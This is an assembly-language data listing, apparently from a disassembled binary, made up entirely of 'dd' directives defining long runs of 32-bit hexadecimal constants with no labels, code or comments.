dd 2241006Dh, 8229554Bh, 5B3C5202h, 1B530081h, 0FD09204Eh
dd 434C00D5h, 6E2A8AEEh, 19025F15h, 6180D8ACh, 32B0E009h
dd 5D95A1C1h, 217BF4h, 88F4AEB4h, 6BB95C06h, 9B1F317Ah
dd 0D64F0B15h, 794BE0F1h, 1DA30A86h, 7D6B1Ah, 4EF76F77h
dd 0AD1EA4DAh, 0DC404A25h, 0C26EEA73h, 0E9C700C3h, 39F36BDDh
dd 81006D85h, 951CD63h, 50CEAh, 430B0496h, 0B99A82E0h
dd 0A313982Eh, 78E81E07h, 0F6A880F0h, 49523EAEh, 7EC24700h
dd 9D12579Ah, 0B8A6B600h, 0E5F58FC4h, 0A066015Fh, 8E7935C6h
dd 6D52E471h, 274E5B00h, 0EE020736h, 3FDB0F46h, 85C07C33h
dd 0A447403Eh, 43974B0Fh, 617FC10Bh, 0C0C36C27h, 7BD72CFh
dd 9DCA434h, 186B403Eh, 25ECC40Dh, 9033C900h, 60CC1A4Eh
dd 0FAD7005Ch, 539AE7E9h, 42032CEBh, 0DD8AF240h, 0A01CC343h
dd 3CA5065h, 0F85371C3h, 0C4F86CB4h, 221CFC38h, 0BAC09B32h
dd 0A09DEC21h, 8C0B00DAh, 4F173F2Bh, 0FB060D2Eh, 335CEF7Eh
dd 0E3BFE7Eh, 0EBCBC887h, 7C276F20h, 0DB00CA83h, 14981548h
dd 79C6E69h, 0CCE5B063h, 0D15AB0C6h, 0A107FBBBh, 0B5E9BDC8h
dd 16EE9440h, 0F029006Bh, 74703830h, 99004180h, 5B23598Ah
dd 0EE3F26ACh, 0BD581D3Bh, 209785h, 398D028Fh, 0F80CA588h
dd 0DA86B598h, 79D100DFh, 9995C724h, 6300B0D0h, 33A1BBCEh
dd 395A1AD4h, 0EF8090E4h
dd 0C9DDC60Fh, 620FE63Eh, 67DEC452h, 0AD70DFABh, 1FB2D45Ah
dd 81219428h, 3A07B326h, 620CC0B6h, 0E59C3F00h, 125430F3h
dd 76940027h, 51EE45DFh, 3F003DF6h, 6E1D5506h, 0E254A8h
dd 7644427Eh, 2922C3D6h, 0C1D4CB00h, 0AF5A2DA0h, 0F081E859h
dd 0F9D20044h, 9D706CADh, 7375EBAAh, 91B67D0Eh, 0D2634047h
dd 0F2B26F5Ch, 90510339h, 2FEB1A82h, 74BE0CC0h, 36FE2500h
dd 79141558h, 0BAF7001Eh, 39493089h, 0AB00A093h, 0ADC12181h
dd 70F1CB3h, 0A9C83EACh, 0BE737022h, 6A097CF4h, 80C057ABh
dd 0D9528EFBh, 495E0086h, 0BCAD6CB5h, 1F1F1EA5h, 97BD6A2Fh
dd 1C07F0EDh, 0B3B09D19h, 0AFA0C9h, 5C398B38h, 68224C32h
dd 0DF6F8400h, 0F069BB7Eh, 0CB12000Fh, 71D56D9Ah, 1A0049E0h
dd 8896E954h, 60E115h, 0EAA3613Dh, 8335D2CBh, 0F0639B00h
dd 4CA5A4CAh, 3FB30760h, 0A041A67Ch, 0D636AD77h, 0BFC9EB00h
dd 9AFD8621h, 33440F47h, 0D500FCD0h, 0E0BDED3Ch, 0EA023771h
dd 1446F436h, 8EB64042h, 356C07B8h, 0A3D9A151h, 0BA800604h
dd 8300A975h, 2A3D677Bh, 0C53799h, 3FC11AD1h, 9A4CA352h
dd 3BA06200h, 3EC70D4Dh, 50453EA1h, 74B4CF00h, 271378D3h
dd 9347640Eh, 0F8BB60EEh, 7E49DADh, 41865788h, 4C64C169h
dd 0FD9CF89Fh, 0AEAABC0Fh, 9BD520E9h, 747EDC7h, 0DA419317h
dd 0E71EC00Ch, 0D0084AEh, 0E4D4FAF7h, 7585C880h, 93A800EEh
dd 1E026197h, 900188Ch, 0B6A61423h, 123664h, 0A39E4142h
dd 0C8C3A8EFh, 0D9431B00h, 0F3EB96E8h, 7F800093h, 0BCF6C992h
dd 0C3008C70h, 0FE1E156Fh, 0D0E412h, 7610A6FBh, 5EB04BA3h
dd 43DEDA00h, 93669450h, 9B200685h, 0E6F68CD7h, 0FC22900h
dd 94D559C0h, 0AB781E32h, 0C765077Fh, 0B2AF500Ch, 7AE45EE2h
dd 85CC3003h, 808DC9E1h, 638AE7h, 0DAF9220Ah, 57DB7DBh
dd 0E63875Ch, 0C06E41A9h, 0B265C167h, 795D000Ch, 7BC46D3Fh
dd 0F00C752h, 94D612AEh, 0C0D5B3h, 2FE0986Eh, 1AE177B1h
dd 0C3EA8E00h, 0B9286B20h, 0B3C2008Fh, 0B23A67EBh, 30070E2Ah
dd 0BEEC9F2h, 47DB920h, 2FE675h, 4B10FC12h, 0A63826DEh
dd 856A6404h, 0EF80CC5Eh, 0F69076FEh, 0F9C300AAh, 0F1C5433Eh
dd 62003BFAh, 0E33FB9AEh, 50BD074h, 0B612C2CBh, 70D80FFh
dd 421D71F3h, 0BC00A65Ah, 0D4BE2E94h, 2F9E005Eh, 51348AC2h
dd 0A3DCD0Bh, 75301FDBh, 5DC02B9Dh, 31708FB6h, 0EF5838DEh
dd 0A528D480h, 7E5A7C09h, 686EC30Eh, 5900F33Bh, 0AEFD6D54h
dd 0ABE900C4h, 3056A319h, 0FF7F8CA0h, 0D8155F00h, 2C93BD0h
dd 45780729h, 0C024E0EBh, 3E1FE95Dh, 0E41A5200h, 8E7C860Fh
dd 1B3D0027h, 0AF8DCBC2h, 7A004B29h, 0B88B2B4Eh, 0F81F12Fh
dd 7B1C025Fh, 0E84CE380h, 0D6053CA1h, 72E41B6Ch, 0D712C500h
dd 3AED93B6h, 7855694h, 82C9E72Ah, 7435F96h, 51A09FE8h
dd 7BAB8700h, 2C41A85Ch, 734E0747h, 6ED0693Ch, 0DB918A40h
dd 0D90F443Eh, 0F4CEF14Ch, 0F73026D5h, 35B38203h, 0C03392A7h
dd 0D16AF7h, 1034C6C2h, 2EAC58D4h, 7A00F37Fh, 0D8936F31h
dd 9C6987Ch, 0D330852Fh, 37784280h, 0D273B5FFh, 8195DF00h
dd 3E31BC5Dh, 0A09107ABh, 216698E8h, 0D8FDA12Bh, 0A91E19C4h
dd 0E6C0306Ah, 409BAFBCh, 412F0B23h, 0D9005AD6h, 8A87F0B0h
dd 5F00A5E2h, 0ED4739EFh, 1F600ACFh, 835C3C74h, 0A82878F7h
dd 97DF6DE0h, 9E648707h, 53107D1Bh, 3CE501D6h, 5D00CD80h
dd 0CAB5139Ah, 0BE72D91Eh, 6BB69700h, 3CD11B4Bh, 70F1DCCh
dd 9C1440ACh, 3D118432h, 92F54007h, 7E50DDCAh, 3D55726Fh
dd 0E20351B0h, 1806B241h, 6D59DCB0h, 0A6E12000h, 1E518BBAh
dd 0AC5F0767h, 0F0FE4435h, 0E17FEC03h, 6349BF00h, 564CA760h
dd 0EE40007Ch, 0FC61936Bh, 0A800C2D9h, 10A1128h, 0F30AFC8h
dd 901CB16Fh, 53E19400h, 0DC00290Dh, 77701008h, 5830A5h
dd 0D259B02Ch, 54C944ACh, 0FA2D8C00h, 0B8267DF7h, 31D70179h
dd 425C6D36h, 21C1D871h, 157DBDF8h, 56A89D03h, 0E0E1DAC9h
dd 7A0C6EB9h, 3FBE00FBh, 2A06B1Bh, 26032039h, 31DC0A4h
dd 47C0CDD7h, 0B072A33h, 0AE04BE38h, 27E6CF83h, 35E896D0h
dd 0B47964E4h, 0B3896F00h, 9B1D318Ch, 0D2AA0150h, 45AC5343h
dd 5FE0D08Bh, 5AA2E31Ch, 807875C0h, 0F0037D9Eh, 0D6920E08h
dd 72802981h, 0A4B3A3B6h, 0E6773E00h, 0BCE968B8h, 678E00DEh
dd 243F8F44h, 7C00E2A7h, 21CD507Ah, 140D60A4h, 0A1679340h
dd 0C50F0078h, 0D38BAF15h, 57005DAAh, 31B1CFDEh, 3DC697BAh
dd 2700FBD4h, 0AAE86CA3h, 5400EC77h, 31AEBD9Ah, 0AFE792h
dd 20C863A2h, 8529D649h, 28E3900h, 0E4835257h, 4B7F005Dh
dd 2260F22Fh, 1317D80Ch, 0C600EC34h, 2A8C1BAFh, 7D0B01CCh
dd 4CCE711Ah, 1DF360A9h, 407A8E00h, 34B44D07h, 97C30E22h
dd 72A00939h, 7A58DC74h, 3F570800h, 0E5A8FA95h, 0D5A700F0h
dd 0DE96645h, 0DC00F517h, 0E0B0FD0Ah, 794E410h, 0D0562B3Bh
dd 1D3C50F6h, 6A3AFCB4h, 96BB008Bh, 8502FF98h, 11D00032h
dd 0A9A6AB79h, 8C00DEE0h, 8FC2EA1h, 71C0B1h, 0DB46299h
dd 0E8F46C89h, 382D4C00h, 0DA03B327h, 1067006Eh, 4577FF08h
dd 0A201F20Bh, 27EC2183h, 3DD01CB4h, 9BCF001Eh, 0B9E547FCh
dd 28000F52h, 0B406079Eh, 30A0E4Fh, 0A7AFFD8Eh, 76D943A2h
dd 0C0316084h, 0C26E6F00h, 3D295FB1h, 3C740Fh, 69F6EFA5h
dd 3BBFA03Ah, 76AA2F00h, 6104DC6h, 861501D6h, 0FC3DAFD9h
dd 7380EBF0h, 0B700D55Fh, 515459BAh, 0FACEAEFBh, 0D8F70A3Ch
dd 0F4E9A8h, 9E71C3B0h, 0D3E8DDCh, 9F7F80F3h, 0FFDABC9Dh
dd 0DE680072h, 0F2FECE39h, 38005BC7h, 2EA0A7E9h, 0D45E50h
dd 3C5CEFC6h, 5D8BE5FCh, 0CE8C5F00h, 1AB51FFh, 98C5704Dh
dd 7CCC7621h, 53DC0039h, 0A6489716h, 907B27Eh, 0C940910Eh
dd 0EFF6E550h, 5783006Fh, 0B5F870F5h, 4D00CDC0h, 79C3FC22h
dd 361DFA1h, 0C3BDE81h, 17803396h, 0E4039C67h, 34CC68D1h
dd 22F9A0C6h, 0EC0900B9h, 5A55F21Ah, 3F007597h, 0C59D37Fh
dd 4DDBAh, 0B65C9D5Eh, 0CC57B4E7h, 4E004B75h, 8589707h
dd 15AD4Dh, 9EDBF34h, 287417DEh, 0BCC3213Bh, 0A3670038h
dd 0B8734750h, 0AE960185h, 9E1BC244h, 38FCF47Ah, 4058E200h
dd 7BA0065Bh, 3D90EE0h, 8EC0FD93h, 839DEF74h, 96C3DF1Eh
dd 148BE400h, 3037CFh, 0C25F94ECh, 0EB66285Bh, 177FE600h
dd 0D4C85158h, 5DFC03B5h, 5E9CFB9h, 0F54373B0h, 3086800h
dd 3EE62519h, 1A1B0078h, 74302FBBh, 1D7AA7F6h, 0AF35200h
dd 0D70D17B4h, 0CDF401F1h, 5F6A20Fh, 0D8AB608Ch, 0E061A100h
dd 36309420h, 596C0FE3h, 7860DE48h, 95F3269Fh, 0D6FCBD00h
dd 3EFA57D8h, 62A500B4h, 0E116AE6Ah, 0C2008DF7h, 242873E7h
dd 1F0595CDh, 8E1E292Fh, 5AC06FA7h, 0C452AECBh, 472A507h
dd 0FA610AB7h, 1FC8A8E4h, 0E6C00139h, 0C6509A44h, 2276E43Ch
dd 0AC471518h, 61D290h, 8CFEFFD7h, 3298AFE4h, 0CBD1D900h
dd 4388DAA5h, 4A8B0059h, 0E9A6BCEEh, 6D000A3Bh, 0A95629E7h
dd 527455h, 2C117E09h, 5FD05BA5h, 89001076h, 0C971CCEEh
dd 7C4247h, 0C09A5813h, 52B6C55Ch, 1BD46B07h, 1F10F96Fh
dd 0ECB08EBh, 0B141C186h, 0E48BE320h, 2E0057F5h, 0D7F33622h
dd 1D0D7A69h, 380A9E62h, 78D41E00h, 2C3D95A9h, 80964C38h
dd 0AA1DE7EDh, 7311F1h
dd 9CC8809Eh, 8BDD81DBh, 22DF4900h, 9D5F8AA6h, 50681ED0h
dd 77D380A7h, 3F7393ABh, 2300A3FAh, 6C094BA6h, 86B0Dh
dd 985ED86Eh, 69E582EAh, 464F9700h, 65A183E0h, 0AC1E00F1h
dd 7C590ABCh, 613120Bh, 0E380EEA7h, 0EC4BF4h, 0DA1DCF20h
dd 0D657D53Dh, 9500317Bh, 3EBD66B4h, 7C9ECA7h, 656885C2h
dd 8E0B029Fh, 58415FE0h, 4CF7BF00h, 0D331631Fh, 6ED23C42h
dd 7F7B0100h, 0ECB55CFDh, 22FF8E01h, 9E95C620h, 0EAC4D0h
dd 0A980B33Ah, 978E7901h, 0B00E1B8h, 0F8544CF6h, 14703896h
dd 0A30C13CDh, 0F5B9007Bh, 4E976350h, 0F3E826C3h, 1A7928EAh
dd 0EBF9AB07h, 0B120834Ch, 0F7D9Bh, 0B34EF5AAh, 37AF5B04h
dd 958B1C00h, 6E59E848h, 1B2E0068h, 8F28CC54h, 1A3D5DAFh
dd 5EB301D9h, 269EA320h, 623A70h, 0A8E54C7h, 0C4608002h
dd 913B8C00h, 0F942B131h, 41FC0014h, 1392AF08h, 4307A4BEh
dd 0C730BF23h, 426BA690h, 0B66C0082h, 8669672h, 0BB00A293h
dd 0FFFADAD3h, 0F6EF60D6h, 7030008Bh, 249EA95Ch, 8F00C83Fh
dd 0A23E952Dh, 3BF0A51Fh, 0DD806027h, 0DED08710h, 0A0083FBh
dd 780249Dh, 5733FEh, 49347598h, 88DD9131h, 0C62EE00h
dd 8D6AA248h, 0D1C700C1h, 98A9E7Ch, 45012DB1h, 0FFF149EBh
dd 85402684h, 71F3A9h, 0DDAD92B7h, 7EF03CF2h, 61D08AA0h
dd 0C5E75800h, 5B4F738Bh, 2E460087h, 0AC32DD78h, 933BE925h
dd 983E80F3h, 951A5ED9h, 49470088h, 7A54E2FFh, 80005987h
dd 0C15341A8h, 3C391EDh, 0AA92E048h, 0D2F0DCE4h, 0FB00D6BDh
dd 9840909Dh, 0E8ADC6CDh, 3274049Bh, 8014F183h, 5AFC44E9h
dd 0D285F303h, 0E8535C86h, 776946h, 5F263514h, 5E606D64h
dd 3DB7FAC0h, 1C28EED7h, 806CC31Bh, 4564E987h, 5900C94Dh
dd 0D12A6E6Dh, 0C0B4BCh, 770FA7B6h, 0A8623B20h, 80DCA23Fh
dd 85D84384h, 0B12B9Ah, 0C9DD6C6Dh, 191EC314h, 782738h
dd 831A469Bh, 0E859E0Ch, 93EF1FFAh, 9F00D949h, 4F5C10C6h
dd 736FCCE9h, 0F9137501h, 999FF0D1h, 0F6B103F0h, 14AF00BDh
dd 6CE5C52Fh, 52024B34h, 0ADAEA5DFh, 632BC02Ch, 0B14D002Ah
dd 7AB00A81h, 7D0007E3h, 4E373D51h, 0B6D1D2h, 1F022FC8h
dd 2C74C097h, 0CD229500h, 28AAA9CAh, 44A10055h, 0D3F70489h
dd 2300159Dh, 48E8856Dh, 0E4B5E29h, 901637B4h, 0B1727DA0h
dd 1100EA9Ch, 0B5090A2Dh, 424815h, 0BBBA2CD3h, 506D0521h
dd 970033F6h, 834EECFBh, 36F852Eh, 35B992BEh, 6EA82099h
dd 6C073ACCh, 0C8F26B69h, 98BD0F00h, 0E212014Ah, 88FD11A1h
dd 400ED81Eh, 0D289CC00h, 17EF6DDAh, 871C0060h, 42C8B793h
dd 5800860Ah, 3741AEA3h, 0F2CF3F78h, 0A21E0316h, 7CE5AC0Eh
dd 0EC9130E9h, 270137C9h, 14471C79h, 8F200565h, 0B88D00F2h
dd 21C9CEBFh, 0A2005DA7h, 15F6952Ah, 74394BD8h, 77927BB4h
dd 0F5760084h, 97C53EFBh, 0DB90AD0Bh, 72719B1Eh, 0DA15C0C0h
dd 30AE64h, 8E3117DCh, 0ACE06996h, 5991100Eh, 22264193h
dd 0E1FC8035h, 47300023h, 21DDC04Fh, 0E700AE09h, 9EC64E64h
dd 0B27937h, 24818008h, 0A98D6C73h, 6327070Fh, 0D5FE8545h
dd 0B1A4F9C0h, 0FD800078h, 350FCA14h, 77039654h, 599C3E16h
dd 942CC1D8h, 0AAE4D0h, 0F2CEF368h, 4566EF9Fh, 500A2003h
dd 90C6AEB7h, 6ECFE3FEh, 0F500306Bh, 3E8116B6h, 8069553Bh
dd 14E6AC60h, 0F86FCDB3h, 18B50F12h, 3CC00337h, 9C615EC9h
dd 584BB400h, 561A812Eh, 866E0080h, 0BDE17884h, 440ECF5Eh
dd 2021EB25h, 9F74261Eh, 0FD64008Ch, 80DE5A89h, 0EC706CBAh
dd 5B686F00h, 42C199FFh, 179703Ch, 4B29C785h, 0EF081AAFh
dd 80C063B3h, 0E4002249h, 0B81ED48Ch, 777B00Ch, 0E97257E7h
dd 23B71A5h, 67AFDCA0h, 152B100h, 66F442C5h, 8AE8E0h, 0A4E5B74Eh
dd 0B0575F6Fh, 18515D00h, 0C5BA83Ch, 0F52C00ABh, 0D7388AACh
dd 79EE23E3h, 5C979A00h, 35FCA143h, 143400CBh, 6C546F1Ch
dd 1100179Fh, 0D707D967h, 0E23BCEh, 60863F38h, 9CAB31FAh
dd 11811C00h, 9A5F84A7h, 39C103A5h, 54A3A0F5h, 0A9D40AC0h
dd 2460D700h, 0AD69E15Dh, 3D100001h, 0C7CD30D0h, 6D0065F0h
dd 3B97C3F1h, 909992h, 5DBB5839h, 1B8424B1h, 30882600h
dd 186DA163h, 0EB440082h, 4C2264D3h, 5200387Eh, 7BB8E072h
dd 0ECCFAA1h, 0C9CFF1CDh, 0BEA2F943h, 0EA143CD8h, 0C7A62700h
dd 0C18A794Dh, 0EE34B0DEh, 4FB900ADh, 3DECF97Bh, 0A3E0C731h
dd 5958A000h, 531A054Ch, 22AE0075h, 3683A877h, 0E9724160h
dd 58F54B00h, 0E45BB1FEh, 6C4800F2h, 0A10B85AFh, 0AE00B5C9h
dd 74015D75h, 75CD0D47h, 3D3000B2h, 3F8025EFh, 2100E060h
dd 0D2E182B8h, 0F1BEB5h, 7FAE2440h, 8AA1220h, 7153720Fh
dd 9B04060h, 0B1A26h, 0A98783E4h, 9DDC9480h, 64359E03h
dd 0A0C1EBA0h, 34C9C55h, 7CD41C18h, 8590D77Fh, 0F700193Ch
dd 51C7DEB6h, 1FB304h, 20FAEFE1h, 12BF1A7Bh, 0B8C90C0Fh
dd 1A2475Eh, 0A1506A00h, 0D9C6008Ah, 0ACD58D44h, 48773830h
dd 0CDF95601h, 5B2762FBh, 0A970F8h, 0D529C89Ah, 9D945C4Ch
dd 0D3FFC600h, 668B374Fh, 0DFD10088h, 73135FCDh, 8A0E2996h
dd 99E659h, 0DD173CB1h, 2B380087h, 89303A28h, 0A600ECF7h
dd 9CF3411Eh, 870DE7h, 42B788Dh, 284B9D6Ah, 11B3B3Ah, 0B5595F3Ah
dd 0FFC782D4h, 0A6CABA10h, 1BDEC27h, 2908E0B3h, 0C07439CDh
dd 19008C46h, 0E4212A4Ah, 0B42CD7h, 87E7237Bh, 0A301AA84h
dd 0DAB62600h, 57868B4Ah, 0E9420038h, 9D3F8860h, 0FB77E253h
dd 301EEC0Fh, 507340DDh, 0AC0B31h, 63B36C2Dh, 66CE8905h
dd 1FC21300h, 3CBEFE21h, 1A9704B8h, 8020597Eh, 0AEFF4803h
dd 0D5C06C00h, 0CD034484h, 912207F5h, 90D7DF1Dh, 0C482CE55h
dd 0DE391574h, 66A35025h, 7F936D00h, 0FEAAEC2h, 0E08407E1h
dd 2023F416h, 0F9F30594h, 467E3803h, 0F85EF07Dh, 373463h
dd 0D069265Dh, 0A3849BEBh, 0DA748B03h, 0BAC1F079h, 8E88C061h
dd 0EA6400A9h, 1513DCD2h, 88005D46h, 0AC4EFF40h, 3A8A8D89h
dd 0FF5407h, 69DA20CFh, 337947CBh, 234D2B00h, 7D0E8A2Eh
dd 8E3F3BF7h, 73524400h, 7CD98BFBh, 0C557A700h, 96BBFE40h
dd 5578D3h, 0E169FE3h, 0EC7F332Ah, 28D04700h, 70097CD5h
dd 5CAF01B6h, 0AC482F5Eh, 88D6F8E7h, 81690C00h, 104C3840h
dd 5FF900ADh, 3566E46Eh, 0E73FEE9Eh, 375E00C8h, 19240315h
dd 2E5772BDh, 5044321h, 2980F5h, 9D06F1D7h, 0B503FC35h
dd 3BABD6E7h, 0F6D43DBEh, 94432580h, 2A950D83h, 0A8162803h
dd 0E837AF56h, 77F88BDh, 0AEB0F00Fh, 73E200A6h, 0DE00FF01h
dd 3654C216h, 3D1DBCh, 1E382CB1h, 1308589h, 46B3400h, 0C4725BFAh
dd 0EC4E0006h, 4BF03295h, 26009FAAh, 0E27BB7D2h, 0E1D3A3h
dd 1C41B3CFh, 0C40B02EDh, 665A3Dh, 0C2F74B8Fh, 71769D4h
dd 0BEFB13B3h, 56FDE061h, 5007C37h, 0CED4E963h, 0C93EA1h
dd 0EFB78C70h, 0DF0A6D32h, 0A700057Ah, 38296BD1h, 7D220288h
dd 1CF71DB2h, 6524013h, 30E8D5C5h, 2815D0Fh, 0F37D659Eh
dd 7569A180h, 0C35700FFh, 45BC5A80h, 78007F79h, 0AE1172A4h
dd 0F346F0h, 1E63B630h, 2A135E0h, 0A659D400h, 1C0EBC58h
dd 76BF0055h, 926451B6h, 4C00E137h, 2FCFA482h, 322EDE0h
dd 0E60C3583h, 0DED8B92Ch, 0D00042FAh, 2D61FE2Ah
dd 2F92B1h, 7911F753h, 0BC0497Bh, 7B09C00h, 0AD51873Eh
dd 88CB00A4h, 79A515C7h, 8A000944h, 4A32394Fh, 0EE7C6Ch
dd 40BB6AECh, 0B6ACCAD2h, 88B86903h, 0E320C0A3h, 714B05Fh
dd 52960F9Ah, 0DBE3058Dh, 57B88E78h, 0BA3B8934h, 0EC3EF54Bh
dd 0F50D8122h, 0F8EF05E9h, 39C86FD4h, 0D305FD16h, 1DF36C18h
dd 641280DDh, 0A0EEE60Eh, 0D8C81B00h, 0AD8C71DFh, 18434817h
dd 0E6C34A00h, 0EFA00AA2h, 50F3D300h, 15083A1Dh, 3DD6022Bh
dd 5E4C6F7Dh, 62BD51C0h, 0B2C38E00h, 78E6E706h, 0EA200BEFh
dd 7700FCF8h, 0CD905C9Dh, 0E9D58800h, 3D76D32Ch, 23F800ADh
dd 0CC1863F2h, 854CFBD2h, 8D9100F2h, 56AE3926h, 2320115h
dd 0FAA6637h, 6FCBC754h, 35BCA1C8h, 1D112A00h, 0E8267491h
dd 59530001h, 0D9E4B4A0h, 0ED00AE6Ch, 68C8683h, 0F2CE52F9h
dd 0AAA8030Fh, 15DC209Ah, 95593EA0h, 54D68916h, 5BCA0600h
dd 26E7F9A6h, 5E1565h, 0DA7079C3h, 2801CD50h, 57CE0B91h
dd 0D8F709BBh, 0C9A02Eh, 34409861h, 0C792558Bh, 8ECBFC03h
dd 0D8AFFE22h, 2BBB76h, 46705AA8h, 3653C1BAh, 7924E003h
dd 0A89EFD78h, 3ED304D2h, 5C837454h, 9CAF93FCh, 77E22998h
dd 0D69ADD1Dh, 0D921AB00h, 79555F1h, 96B9247h, 0F2A9007Ch
dd 720007C5h, 34D0734Fh, 0E427570h, 0F38B4EADh, 1F41A2A0h
dd 0BC012A39h, 21EA232Fh, 0A3E022F1h, 0B3300149h, 9EE964Ah
dd 319C072h, 1ED0C200h, 0D23FF506h, 0DD6500E8h, 2FDC5CB1h
dd 0FC5CC8FDh, 122B0040h, 0A2C6C72Dh, 458D3C6Fh, 0C3908A00h
dd 0A0FAC241h, 0E2188200h, 55B18864h, 3A9F0303h, 7F36277Ah
dd 909769B8h, 0F7463300h, 6F65541Fh, 6253000Eh, 95C177D1h
dd 0A900AFBFh, 0AA33F4E0h, 1DD0D2BDh, 47712756h, 2018EA76h
dd 0B3485EE3h, 0C9B93F00h, 5443E616h, 9C6600C0h, 0B631AC0Eh
dd 0CE00D59Bh, 4B836749h, 1CCB9AEh, 0A2700266h, 0EB7FBEADh
dd 0D4C98B0h, 9D7E8C76h, 0A54E2500h, 0A40F0CD5h, 0C54700C4h
dd 2BA795F5h, 0AE0013B9h, 0B87AC73Bh, 445B3h, 0FA0E52C9h
dd 499C24A8h, 8EAA183Eh, 80F7EA83h, 0B5337506h, 0A59500BAh
dd 240D9D15h, 2EF49F09h, 0DBB93104h, 2280D419h, 7377346h
dd 57510170h, 0A724C0F7h, 101ED3ABh, 1E3E99B1h, 0A980BE97h
dd 66F3D7ADh, 0DAF214h, 981C3CD8h, 0A2A88D82h, 0BDF5C407h
dd 8710E4B1h, 0B350A1h, 22E50CC7h, 96A3AC8Ah, 0E8E3E9FEh
dd 0EC00C423h, 0EAB7A993h, 0F5D535Ah, 7D20D36Fh, 0C3CA4CA0h
dd 0B2003F22h, 0D42DDB7h, 10596F3h, 0AB978AFBh, 0FC7E90EAh
dd 23009AD4h, 0D13146E3h, 7FA108h, 6AD34D1Fh, 0C4E5D794h
dd 1500FAE8h, 7731A5B3h, 0DA5532h, 0E8952C39h, 4F0B78Fh
dd 916D38h, 668ECECFh, 10F7BFh, 48E0C077h, 6E94A7FAh, 89E66806h
dd 50A93CDh, 6B4DC980h, 0C6B881DCh, 0D437FDA8h, 0DE03A5C4h
dd 0BC2B0B01h, 6965F0B2h, 0D46000D9h, 626CF4B1h, 0B0075ADh
dd 9CC37E82h, 3AED8C5h, 0DEB8E4E8h, 41F0F1EFh, 913CD671h
dd 210860C8h, 34F55CEh, 4077C524h, 7CA034F8h, 0B51E2AFDh
dd 0F0803E92h, 0CAEAA15Ch, 6E63005Eh, 253C66CBh, 0EB614BC6h
dd 97F3B82Ah, 43FC6831h, 0E65600FAh, 9421D522h, 0FCEFA90Ah
dd 0A100D9D7h, 0FEADCAF3h, 4408EEh, 7169908Dh, 70D0BE8h
dd 318B0300h, 492B5668h, 675F00B5h, 94C56026h, 10009A21h
dd 0CE6A2A4Ah, 0AF50D0h, 0E83C9147h, 0DD15CD04h, 71E46400h
dd 0D53AC16Fh, 0A62307EBh, 0C056F712h, 663983F4h, 0CCE5D900h
dd 0F3185776h, 48ED01AAh, 0E6920EDAh, 0D56FFCBEh, 9CD88A07h
dd 83906A7Dh, 0B86BCBA7h, 543C1EA3h, 8BC0C32Dh, 36F0EBADh
dd 0A10E0DAAh, 0A07D5CB4h, 63CCDFB5h, 816A01A5h, 8AB94296h
dd 9E89C4B6h, 47BB1F00h, 0CF087C6Bh, 0B4260070h, 82D98D66h
dd 0C900C258h, 9794BD4Ch, 0B9A42B6h, 1C896D4Eh, 5840A58Fh
dd 0CB649B83h, 0A4C9EC00h, 0E58A1155h, 1D5C00C6h, 76757F22h
dd 32390FE3h, 73F4003Ch, 7C61B5CCh, 14D10068h, 3887EB2Bh
dd 2800FCFAh, 172A9AF7h, 12C952h, 11A59619h, 94AA4705h
dd 990B34F0h, 20B6CF91h, 4796FCAh, 585F3FE6h, 5C6D848Bh
dd 44686880h, 8600E040h, 0ADE3D70h, 0D4F5ACh, 1B395427h
dd 0A197A5D2h, 11229024h, 0CE56B600h, 2D68B1Ah, 0ABC237C6h
dd 0A0401B4Bh, 50021C8h, 0CCDB33F3h, 9926AF1h, 49729B8Ah
dd 1A7BB883h, 5D834C3h, 2200FCFFh, 1677E4CEh, 88D30Bh
dd 53DEB5D8h, 0CDC40AEh, 263C9DFCh, 8C407EBh, 50C27A13h
dd 0E7676014h, 0A7AB00D4h, 0B892BC7Ch, 0D00F3C2h, 8FD656C6h
dd 3D4150A9h, 3B00D778h, 959F1762h, 8D16334Ch, 9002597h
dd 201456D2h, 0D7040008h, 8FAAD9D5h, 0C500B165h, 0A0956973h
dd 0F2D15AC8h, 7B0F386Ah, 0BCCE7207h, 0FF0381CCh, 438840A1h
dd 3D005696h, 0DFC67B3Eh, 409D0Ah, 58E31799h, 0BCF07316h
dd 3CCFBD00h, 0BF304B61h, 0A990D9h, 0D5465F92h, 670CC3F5h
dd 64A67D00h, 91B46B3Ah, 0DE2C0024h, 0BC196EBDh, 0A9007BC1h
dd 0B230C5F4h, 32EE13h, 1ECAB3DCh, 52F2095Ah, 92008DFAh
dd 72ACD390h, 4CAEE3F5h, 9300E6A5h, 6889FC07h, 0A40286F2h
dd 34B06CFBh, 0A079639Fh, 927D2D43h, 60390187h, 80DE48F1h
dd 8540C49Eh, 6D13BC00h, 7DB9B8EBh, 5A80020h, 76FB6EDCh
dd 72F2E394h, 8C33C71Dh, 3A4667C0h, 0CA25FCh, 0B7AC8564h
dd 37124F83h, 310346B0h, 0F9E8AE3h, 2D9A984Ch, 1FFF28Ch
dd 5A1DC398h, 0EC5848E8h, 0B5F45651h, 0EC00CDE2h, 9B891CC5h
dd 1E0308h, 24F56D99h, 8FDA0731h, 6FDFAA00h, 0A8DBBD47h
dd 20D1007Ch, 0FB316339h, 3214A4F9h, 95E70Ah, 344B26CEh
dd 986CE602h, 39800B0h, 0DEF9736Ah, 0B7037DE2h, 24A65807h
dd 35D6D832h, 9D4603FAh, 86D5EF80h, 0F5FD83B0h, 0CB9B0500h
dd 0C44C9FB1h, 0FF2F5C49h, 67773600h, 0DEE7B8F0h, 0DC0071FAh
dd 9F21F4Fh, 0B3DDBh, 93C6A9B1h, 15C36819h, 35FE8CEAh
dd 5A560600h, 5734718h, 0F0D000B0h, 8539DB9Ah, 0A2023E55h
dd 7EA0B8FEh, 98BAC32Eh, 3C2F9B60h, 7AFE882Ch, 93B20091h
dd 0F5B73F33h, 6D00DD61h, 3E0EEF81h, 8C2010h, 5DA26C49h
dd 67D2B6E2h, 0F07F7FE8h, 4EB7F100h, 88AE4045h, 0E710037h
dd 3F863998h, 0B0186FEBh, 1EF607C2h, 0B67C0081h, 444CFF34h
dd 0CC00E15Eh, 35A1A77Bh, 67DA2Bh, 2A8E2489h, 90ABC581h
dd 69B7DF0Fh, 0A31D2047h, 1799C8BBh, 0ECEF1D2h, 55A06D3Dh
dd 3BEC1718h, 0C43A6100h, 0E62957CCh, 1F5379E3h, 8E0F6301h
dd 24A0DD06h, 55DF4436h, 9BB74000h, 4C2C608Eh, 0ECBB07E0h
dd 2075FB83h, 2578693Fh, 0BA64E300h, 0C824944Bh, 6E80168h
dd 0D5EE7691h, 113E609Ch, 0E9A57F00h, 89C225E1h, 6B2700B5h
